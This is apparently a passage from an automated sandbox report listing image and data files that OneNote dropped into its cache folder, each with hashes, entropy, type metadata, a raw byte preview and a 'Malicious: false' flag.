File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3
Category:	dropped
Size (bytes):	242903
Entropy (8bit):	7.944495275553473
Encrypted:	false
SSDEEP:	6144:YVxOYlZX2kCWfYoFMXC/sBFC9r+4iEGM4rrcPoWmwkU6FJ:+OwZ2kbFMC/L99ifvokU6/
MD5:	C594A4AA7234EF91E6C2714CFE1410F1
SHA1:	C0F720D4CE3196852814D0B7347F0CAA0C6FD526
SHA-256:	10C833E47BE1C8496F949A6B059C2D79212A4DD66BDE62116EA337FA4FE0B654
SHA-512:	7313F6545A334F9E2DE5430B2DB5C419C4C8A40E075338DAFCD74970BCC6309786946E5DFB57531612BF4C6269495655706D920FD99922FDACFF9796710DA9C0
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:10:32.............................R.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...v&.F;-v;}FH..Z...N..)Y.......h;C....G.0W..ww...MI..Z+..\.........c..4.1.~.Yo.Y6.&. q...............l.A#.~s?yYg..7ky...r

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005H.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.342496368699137
Encrypted:	false
SSDEEP:	96:Y5slGDTYLhVoOZwEXMRKXvvU96d8RQytws:yslBLh6wNXMRKXU96d8RJtw
MD5:	4C08C461E347F9097EC67E5492B510EC
SHA1:	2402516A7C19E374B06198B7C3E3340FD2D559D3
SHA-256:	1D2E4DDF360D923BDF92EC72FA104837C6D6616F63C5E76EA0DE215C6B960445
SHA-512:	BCA7BDE36F8E4BC4752A58A56D298A0E084B50F740AD50EFC1DD172E0E58B42CA8444E1A478C2CB95C68A51E6247EEE9D94A87B29C1DCFC31D0C66D1C6A3DF10
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ.........:....".,o.9d..:....".,o.9d....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'............. G........X.z1.....N...^......................N. .<..]k........f........................................I.qk..B.....LZ............ G........X.z1......... G........X.*z1.....................................................................j......T.].............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4......................#..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005I.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3
Category:	dropped
Size (bytes):	70028
Entropy (8bit):	7.742089280742944
Encrypted:	false
SSDEEP:	1536:ub4bgbB7g9cKCmSzaNF0jAdAzQKTEFBQqUp/i0yG1pidLHTVX:ub4bIB7Qg2OjbzjgWp/i0yGCZx
MD5:	EC7811912ACA47F6AEB912469761D70D
SHA1:	C759BC2D908705D599B03BDB366C951B11F99A4E
SHA-256:	FBB4573E3BEE1B337077691BEBAE15D6FAC52432405D31396D526D7694A8283D
SHA-512:	881828150993A8C56E36CDA2051D89C1F6E0322643902C9506392C163E8734A2933A46486F40E5BC8C8D0164E180605E52620EF22FE14540AEA787A38B22E98E
Malicious:	false
Preview:	......JFIF.....H.H.....7Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:12:29.............................V.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................}.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....H.yM..? .Z.. .^.x..p.8.A...K.... .\{..)..y....t..=.^y)..v.@.W>. .h.. ..p.:.\)(.$....$.I).....!....E..Z.....&.5.).

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005J.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.3239684256869335
Encrypted:	false
SSDEEP:	96:WscwKiYZmE5VQBXSiSENB96g4RQyR9od:WscwnYxXQBXSihB96g4RJPo
MD5:	25B737CCB3C82F3EE53789CB0A0AC6B9
SHA1:	AEE00A320A7456D77487CB8395C8541107C14377
SHA-256:	CE1F9A348CB09C69F5CF9616CC1C426BC21F0405608EC0A2E70D7F48069B013D
SHA-512:	032A7E59EB377ABA9597E83A70BC4DBF2656BD66248B2E21402B83C435C31A6C7C1BCDFC803F31FCF324B8446AD62F69AD73AE04E98A300FDFD14A1C21A4F5CF
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v............................I.......I.qk..B.....LZ.y.......y.\.%...p[NV....y.\.%...p[NV....y...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............7..@.#.)8..\|......N...^................-{.{.E..{.............f........................................I.qk..B.....LZ.............7..@.#.)8..\|...........7..@.#.)8..\|............y.......y.......y...........................................y.j.....y.T.]...y.......y...B...y.H.....y...B...y...>.).y...J...................;........4...4...4.."...............y...y...y...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........y.......y.....#.y.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005K.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
Category:	dropped
Size (bytes):	24268
Entropy (8bit):	6.946124661664625
Encrypted:	false
SSDEEP:	384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
MD5:	3CD906D179F59DDFA112510C7E996351
SHA1:	48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
SHA-256:	1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
SHA-512:	2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005L.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.352811601520681
Encrypted:	false
SSDEEP:	96:8rRsO00E5FTAte+xE4Xzf9C5sRQydPex0Rn01OiU:8rRsx5FT8O4X79C5sRJFeUb
MD5:	8AE7C6E308748779CE8B7A12ECF70E1D
SHA1:	8BE9C2F10082E6A0B12D92C7B2D04C8FFF78EE40
SHA-256:	3259F63117ADCE46C27EA7295A81D4858E3AA1AF4929AD2A32D7798D911A0A16
SHA-512:	58A47E8844F911948413FAE400C4A879FEE087C057AB879C93FED297B38A72F9B8026C152B160B0A1E21EFBFF0FA4AE727D4290A4561C7DD8675D22D7BDEF744
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ.........g......".......g......".........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............j3..)....^..aF.....N...^..................gi..J..-.!T..........f........................................I.qk..B.....LZ............j3..)....^..aF.........j3..)....^..aF.....................................................................j......T.].............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4......................#..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005M.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	47294
Entropy (8bit):	7.497888607667405
Encrypted:	false
SSDEEP:	768:aQ10VrIBdBvDpQrQ7P9/FUOLG2vTSeG9lkCsMKzXeMBk3CBp:aC0JIBL+QsOLG2+ZAC1KqM2I
MD5:	7A450E086AD14BA7D89BA5DB3D3AE6C7
SHA1:	E7AEAFCFCE476390E18C19456BDF6529D863D518
SHA-256:	BDD997068701ED3A00A224EB694B003C01AC69B857FE7B4147D6C34875B1632B
SHA-512:	9B6D50A6CDB6081DA107A2CDDB1BD2811A5764994C8E3F67D56CA81084BE0D068C27435154E867199F38688EA65E8DE02A56DCAC47D0F5E55F0FBB6598814938
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..A..Qa"..q..2.......B#...R%.r...$&b...3Ss.4dU6F.cE..'GC..t..5eufW......................!.1..AQ.aq..".....2BR......r.#3.d...b..Ccs.t......$4T...SD%5Ue&Vf............?..M.7(..).:.a.q.......>..[:O...afQ.uCO..U.....go.l..p..YqVklQ.{i.w&.]Z.\+JQw._.n.'.h..,.bj..X.].k&.Q.>gU..f...1\|....[...jQ.%Zb.......t............V..j.6....Vj..i.....?...IY.P.....$.j........[l.....S.4.J9.U\.......7I..[..=N5....xW..../...=?n....uG.D..S.>...8..3........n.S....]k.*...4.>.R.o..{..l.H.#.^....<amG.m&.......,....wDY.W.m.X....We.IR.Nu...y..Z.l.._S.mr.m...y.]m.R.MT...6.5.5}.K..#%..k].7.Y.q]...%.r.7.R^jR..z.K.T[t.a..d.)glW.r.v,.`....O..^..o:.Uc.\..D....f..D......yt.Q...Y.....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005N.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.454686705423822
Encrypted:	false
SSDEEP:	48:GhTsiVexx+Xltgk7EwLqyFLYcX1vc9e7o1rdQqrjHFLBX3SkxFfd:GhTssXlqWEwW5cX1vc9e70RQyz1t
MD5:	5AE3BB020F5144902CCEE20E41E6D4AC
SHA1:	71B9B1AD0E3FB0C77A59D0148EAE2D162834F63D
SHA-256:	A629BF2F3F996F46B6750971C7CAC6C800153CF8DBA20EC85D0BE7E41C30E4AD
SHA-512:	92393B3430DC6F05BD67E75B39FAB201D8CCE22E51400BF5976D2D0D31293614C6AC38EE396B7788F15741BDB5DDDB0455C2E2853308FBCBC6C5BDA2AAB0EA63
Malicious:	false
Preview:	2...>.......n...v...b...................................................................................................................................2...>...J.......v................................I.......I.qk..B.....LZ2.m.....2.m.u.1....G....2.m.u.1....G....2.m..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............T........a4.x.......N...^................`L..M.@...!>.O.........f........................................I.qk..B.....LZ............T........a4.x...........T........a4.x............2.m.....2.m.....2.m.........................................2.mj....2.mT.]..2.m.....2.m..B..2.mH....2.m..B..2.m..>.)2.m..J...................;........4...4...4.."..............2.m.2.m.2.m..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........2.m.....2.m....#2.m............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005O.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 60 x 336, 4-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	347
Entropy (8bit):	6.85024426015615
Encrypted:	false
SSDEEP:	6:6v/lhPtnlx/QulkWNY2V18A6Akp7eee1VDjMHCyLezyKUX5Gp:6v/7RrIubiA6AkpNhiyKe+
MD5:	78762C169F8B104CB57DFF5A1669D2DF
SHA1:	9638B71B584CD636834016A635ABF8D9C0887711
SHA-256:	E64FDCD0B108737D8B8F7B677029F924031D6BBAA50585D9C3DEF7C7E92ECAF2
SHA-512:	5ED899AAF73B72DEC32E171FFA112382667D5BF3FBA98C92E313E66C0A6975EA97068F4CD32B62283F18DBD5345C11E3610F7EEAC2F2DE71FC44593180B9CEAC
Malicious:	false
Preview:	.PNG........IHDR...<...P.............PLTE......................=l......bKGD....H....cmPPJCmp0712....Om......IDATh......@..aI...B..C..l...^.%.`....>.]..\|0.....a...hb...0......q.......p"....;...K..x=...p...y.yy~J....\|...\.......y..X.......'...>1...Ky..f....&........N`..f0..b...3.......`Z.3..3.....o.......4.&........SV...4.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005P.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.338836585019253
Encrypted:	false
SSDEEP:	48:QBsuEXoWkutm7jE6bXlm9/4zjoxrdQqr8SDBXLk9MKJ:QBsEWkuKEQX49ejIRQy8Ms
MD5:	E703F4D3FED7D4404568C0893787AA0E
SHA1:	6BAB74EE73ECC2C1F1AE17FC6EFF34501AC45D60
SHA-256:	636292183969E21B898CD02287FF18DC9977CCF1DC47C242679F954C4FDAF50A
SHA-512:	E5A2B736B3B303A573626647B058365687463760A7D58BF62814241EDD28177E375F637FF0BF4E8D1E52C6D16BDBAC8D96EFEBD8DDDBB29C432D7EFC3241E6EB
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ.U;......U;..,!....gz....U;..,!....gz....U;..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............`4G@....2...h......N...^..................e..A.....d<.........f........................................I.qk..B.....LZ............`4G@....2...h..........`4G@....2...h............U;......U;......U;..........................................U;j.....U;T.]...U;......U;..B...U;H.....U;..B...U;..>.).U;..J...................;........4...4...4.."...............U;..U;..U;..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........U;......U;....#.U;............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005Q.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 617, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	827
Entropy (8bit):	7.23139555596658
Encrypted:	false
SSDEEP:	12:6v/7Hs2NwBW1mtjeSfaTHHy05riYUtr8y8PQvPYzzg979Reip0QPqc:oOsotazy4rStr8y8PQIzWea0Qv
MD5:	3E675D61F588462FB452342B14BCF9C0
SHA1:	86B62019BC3C5BE48B654256B5D10293FC8C842A
SHA-256:	639EADAD468B6B32B9124B1F4395A8DA3027FF7258D102173BA070AE2ED541AE
SHA-512:	E6EA855B642ED36FA82F8E469A826DC57EB0C36E307045FF8D166F67AF9242C87840833BE31FBE4706DC54100E999D6A3D3A78D0633A3114735818874AD34758
Malicious:	false
Preview:	.PNG........IHDR...(...i..........`PLTE...................................................................................................bKGD....H....cmPPJCmp0712....H.s....qIDATx^...0.Cg.;......@j..2c.=~KP.[H~..@..8...?U.g.n.a=.=.).....3..u^(.....L....5..........8.}..T.f.n.a=.=.).....3..u^(.....L..r....s..8.....W]....,..9..G?.a..`c.z...E.p...)Y.P.....#....@9.7].....,..9..G?.a..`c.z...E.p...)Y.P...`b....0.b.+~{.Pu...1..<..0._.l.@O.y.(...V3%..J....s... .(g.+.qyWu...1..<..0._.l.@O.y.(...V3%...%R.L.Q..x..R.<t.o......7.............:/.E..j.da@i..`b..Z......u.>.?...7.............:/.E..j.da@.Dj..9.W....s. .....:.......L...">w..7... .....:..."...L..."..a....D..Ya.l....E.{.@&.\|.._...7..D..Ya.l.....{.@&.\|....0.J.."z.0s..s....=g ..>........"z.0s..s....=g ..>..l..1...y..g......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005R.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.313209301131809
Encrypted:	false
SSDEEP:	96:OspgxtOppZEXnmXh19iBzERQyso6DlC2cHSl5GSf:OsktesXnmXz9ixERJSDlC2cHSlEs
MD5:	B9EFED21D1CC801895A436BBD7604DF5
SHA1:	1D6F20163A5A42773D0AC42565ABB2B013BAE47C
SHA-256:	9380981C65C259B3B59E4C7F736E1CF927DD22377FDD923D066961D8BDC3FF59
SHA-512:	ACC4365BFA67D52098832B878382E23298D8873D4C307A6B1AEB940C62F29FBD132D4BC78A8D0B230DEEF3BCB3330E4B0ECF89A5D7A7892D629EEE160A2B1FBE
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ..........ih. H...M$....ih. H...M$.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............?.s.O...../........N...^.................z...M..w.q.........f........................................I.qk..B.....LZ.............?.s.O...../.............?.s.O...../........................................................................j......T.].............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4......................#..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005S.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 600, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	4410
Entropy (8bit):	7.857636973514526
Encrypted:	false
SSDEEP:	96:E/pQuIhKZ7u06dICH3AroiTe8DGTl55poBUmLNjpH7MvDHjfm:MpdZtPbknnRPpkLNVMvu
MD5:	2494381A1ACDC83843B912CFCDE5643B
SHA1:	98F9D1CC140076D1AE5A9EA19F47658FD5DF0D66
SHA-256:	5EEBE803E434A845D19BC600DF3C75E98BB69BD0DE473CEEC410D1B3A9154E28
SHA-512:	0E64CC3723DC41D94910F7ADFB6A0DFB5049350FD15A873695614E4A89ABD78B166BA4E9C8CB95E275FB56981539DECD2A7F28FBC25E80DD5E2DEA8077CC9489
Malicious:	false
Preview:	.PNG........IHDR...2...X.......E.....PLTE...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................B..(....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.].\TU.?3"...(..L........q.Q...H.*j......W..Xd.ie.f..%.XT...em..m.m.vkik...>.}..}\|..{'.U..~......}....s.............,CVu.x.:C..5...;.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005T.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.312235393392324
Encrypted:	false
SSDEEP:	96:YFsErx+xZBkEZnf0LXTp9+IEERQy9HD5N:esErKBxB0LXTp9+vERJ9HD
MD5:	D57CEC88E6695BF5BBE6246A8ED6E264
SHA1:	B32443F0676CC555CA47915B6DF19523E7D94D71
SHA-256:	10AA350F83F725F731BAC13A4E4C2A28645A5D881306F0A3367C095BE1650DD8
SHA-512:	EE1E758838FFE46B3BEBBED6E865B1268357DE68E24DFE814F43679AB5CBE96945F906CAD9C4B3A9091653C3D439F03478296D37CFDA66635D8DC83A3E72D982
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ.Vj......Vj......`....).Vj......`....).Vj..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............+T...`z.<[...1~p....N...^................9.\|..K.;....B........f........................................I.qk..B.....LZ............+T...`z.<[...1~p........+T...`z.<[...1~p..........Vj......Vj......Vj..........................................Vjj.....VjT.]...Vj......Vj..B...VjH.....Vj..B...Vj..>.).Vj..J...................;........4...4...4.."...............Vj..Vj..Vj..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........Vj......Vj....#.Vj............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005U.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	136726
Entropy (8bit):	7.973487854173386
Encrypted:	false
SSDEEP:	3072:SIXmy5Tl704vW2ZKkvV8UU0ZWUF0BJwySIdgz816YzDc1+opecYPn:Sny5Tl704fZFV8UU6LGXwyS4xohpQPn
MD5:	4A2472AC2A9434E35701362D1C56EDDF
SHA1:	16FA2EA2D2808D75445896E03B67A93000EEDDD8
SHA-256:	505F731CB7707EFAB2EB06685B392DC7E59265A40B55AAE43E5DC15C0A86CBA4
SHA-512:	5E28D8FB2AC62ED270968072A30013334461F7CAE96058AF9EAA6E10912989DC47112D2133892BF61F7A516B77C6FF71BA2A000B750A9F95C787E538B09595C2
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQaq".....2B....R#..b3...r...C$...X.....Sc...9.%'.(Hs4Dgw..T..5GW.x.)......................!.1..AQa"2.q.......B..#c........b6.Rr.3s$.&..S...C4.%5............?.........(......(......(......(......(......(......(......(.G/.GE&...)..P.x..B.({i2Y;.z?G...Yfc.)H..^....#.....}3..Sc^.H..+...M.a.P.....GS.....H_.3..<....1f........1.<.\..nn-..s.s.\9Y....=.......S.0.......N..cA..Io..r.3..........ay.....K.....,.;9..Q......xO.Fa.2..>........{4k.....\|....?U....3.8..._/3....#.. t.y......yY.......e.<........#.....B.....Z.%.Y..S.ye.W4...l.......X...%.@y}>....l.yi..D..W......L..._D.Q....)...E....n.%...*..K.4#.8`..I....h..h.o..I......-...hB...3..u.(5..........n...,.@....a.t.9.....@.s.>.&...@

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005V.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.307292703092202
Encrypted:	false
SSDEEP:	48:jesz4wq4RHuFufHHL9tQlmxHddEKHLoZXDdxP9OvoFrdQqrSH9BXH9/v4Hqrvd/D:jeshzr9gmbdEKHcXDdt9OvERQyOhd
MD5:	1AC06F5BAED31EAF8726DF628B86E154
SHA1:	293B4A77AAAF9E6F65994246AB2546CFCFF1AAB9
SHA-256:	7BBC9FE1900BD9D9EB35D8338D6E51A54F4F5722D0F571EEA19077F9797FE8A3
SHA-512:	5569A68A7B6A6C183BEB81C8708FC229DA5CD812C5381C76D59932F3B5AB87173C33C0E79B083C782FB1716318DE90067D3D00B249D4572840767F59966B34D5
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ`.......`.."1.q.0.j..h.Q`.."1.q.0.j..h.Q`....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................0........`......N...^.................I..T.C....a..[........f........................................I.qk..B.....LZ...............0........`.............0........`...........`.......`.......`...........................................`..j....`..T.]..`.......`...B..`..H....`....B..`....>.)`....J...................;........4...4...4.."..............`...`...`....z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........`.......`......#`..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000060.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 77 x 627, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	5136
Entropy (8bit):	7.622045262603241
Encrypted:	false
SSDEEP:	96:djzuNKb3XHco17p2wolIxIx7lpskdsC/ddWNKeabJbMojpxLDTu1:VzuNKb397pwlIxKp7qs3bJb5FBTw
MD5:	FA38AFA965141EA3F17863EE8DCCDE61
SHA1:	2B4611E651AF7549C1AA73932B1136B561A7602F
SHA-256:	E1CB1A0EC9BE62D5445C73AA84DF38234002A7E164EE830C9DF24997802CB5D2
SHA-512:	A372674F5CA343321BA9C413D346070709F7685706C9C6C3DC7F61846B59253A5E6FE800DBA10AE870FD3887439B2AA106FBBB51751E92A163938A4393C43E28
Malicious:	false
Preview:	.PNG........IHDR...M...s.....}8nv....PLTE.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................z`.....tRNS...................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000061.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.436144900317224
Encrypted:	false
SSDEEP:	48:zWWDFzsmb7UqxmjzatVsLEBQXLZiL9e9JoxrdQqr4h9zBX7Y2MUqiiuB:FsOUZjza2EaXLA9e9JwRQyCWnUj
MD5:	86CE7ADA28C5089C1211450CAFBA5C3E
SHA1:	918AF4FDFE71BEA24D11B6B6421D7466C9DF0EF1
SHA-256:	22EA295733CABF78A307BB13A938798BFD630417EB5CDC43346D7E9E1C738AA0
SHA-512:	70FC2FA259AD621151C3A90D7F7ACB7057285384CDA80F0D8F648E3C8F1B2E25CDAA9E554A1D577D61C2249D756076673A12B194C3315B2E2A567ACAA3371144
Malicious:	false
Preview:	2...>.......h...v...\...................................................................................................................................2...>...D.......v................................I.......I.qk..B.....LZ.I[......I[..fJ.4....X).I[..fJ.4....X).I[..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............U.F......l.e.......N...^................x6+.H.G..{.5d&.........f........................................I.qk..B.....LZ.............U.F......l.e............U.F......l.e.............I[......I[......I[..........................................I[j.....I[T.]...I[......I[..B...I[H.....I[..B...I[..>.).I[..J...................;........4...4...4.."...............I[..I[..I[..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........I[......I[....#.I[............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000062.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	52945
Entropy (8bit):	7.6490972666456765
Encrypted:	false
SSDEEP:	768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
MD5:	AD003F032F32FAC4672D4CE237FA5C5B
SHA1:	AE234931B452F0D649D91291763B919CF350EA49
SHA-256:	ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
SHA-512:	ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k\|...S..d.4.>.RW5z.$.i.)V.O....>o...c..&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N..\|.4...80.#..e....t.J..ZQ.x\|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......\|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G\|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000063.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.3963695535605405
Encrypted:	false
